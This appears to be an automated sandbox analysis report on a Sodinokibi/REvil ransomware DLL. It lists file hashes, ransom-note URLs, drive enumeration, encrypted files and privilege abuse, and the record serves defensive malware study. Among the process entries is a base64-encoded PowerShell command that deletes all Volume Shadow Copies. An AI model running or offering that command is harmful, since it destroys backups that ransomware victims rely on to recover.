Analysis
-
max time kernel
94s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2024 14:14
Behavioral task
behavioral1
Sample
94ea4614b480418f94bceb76713f109687a6b775244a58d259d34c031e2becf9.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
94ea4614b480418f94bceb76713f109687a6b775244a58d259d34c031e2becf9.dll
Resource
win10v2004-20240802-en
General
-
Target
94ea4614b480418f94bceb76713f109687a6b775244a58d259d34c031e2becf9.dll
-
Size
164KB
-
MD5
271e4cd33c8d55d7117026d6fff1367d
-
SHA1
a66bed3ebba49b49b9e5b19a576ecce5c739b565
-
SHA256
94ea4614b480418f94bceb76713f109687a6b775244a58d259d34c031e2becf9
-
SHA512
bdbbeaf8846798458fe660fce1484ea00b0fba070480eb9dea7f5c8a67733fa4311a43ba2c6c0534c5be22008fda1ac9ec584e79522318fe8ce61d897c945a9c
-
SSDEEP
3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfMtKT11RMU5:veoUeZR2TRCWQFfwKT11RM
Malware Config
Extracted
C:\Users\p581e2b9s-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D46D87276E88EA3E
http://decryptor.cc/D46D87276E88EA3E
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\J: rundll32.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification \??\c:\program files\ConnectLock.svgz rundll32.exe File opened for modification \??\c:\program files\LimitClear.mpv2 rundll32.exe File opened for modification \??\c:\program files\RequestInstall.dib rundll32.exe File opened for modification \??\c:\program files\StartOptimize.html rundll32.exe File created \??\c:\program files\p581e2b9s-readme.txt rundll32.exe File opened for modification \??\c:\program files\ApproveUse.kix rundll32.exe File opened for modification \??\c:\program files\CompareEnable.vsdx rundll32.exe File opened for modification \??\c:\program files\UnregisterCompare.ADT rundll32.exe File opened for modification \??\c:\program files\UnregisterCompress.tif rundll32.exe File opened for modification \??\c:\program files\WaitAdd.easmx rundll32.exe File created \??\c:\program files (x86)\p581e2b9s-readme.txt rundll32.exe File opened for modification \??\c:\program files\ReadUnlock.mhtml rundll32.exe File opened for modification \??\c:\program files\ResizeHide.001 rundll32.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4112 rundll32.exe 4112 rundll32.exe 3680 powershell.exe 3680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4112 rundll32.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeBackupPrivilege 1332 vssvc.exe Token: SeRestorePrivilege 1332 vssvc.exe Token: SeAuditPrivilege 1332 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 964 wrote to memory of 4112 964 rundll32.exe 82 PID 964 wrote to memory of 4112 964 rundll32.exe 82 PID 964 wrote to memory of 4112 964 rundll32.exe 82 PID 4112 wrote to memory of 3680 4112 rundll32.exe 83 PID 4112 wrote to memory of 3680 4112 rundll32.exe 83 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\94ea4614b480418f94bceb76713f109687a6b775244a58d259d34c031e2becf9.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\94ea4614b480418f94bceb76713f109687a6b775244a58d259d34c031e2becf9.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:724
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD589318014e92639900cfdcfb4d659f673
SHA1b4b0f7f23f2f1a0b7c736bdf8206ce2d0bc30b23
SHA2565f5fc2e4e7ab168c28a558b0ba9efde06db75f8712e74616b8c4a91e29f73793
SHA51292f95e53d4f03f369b533f7e672a60928f6615850ac95ae433b11b0ae776cec1333e7ed1fb9daed90d5922562c982f083f79db5e4343642c91267a9e0178f820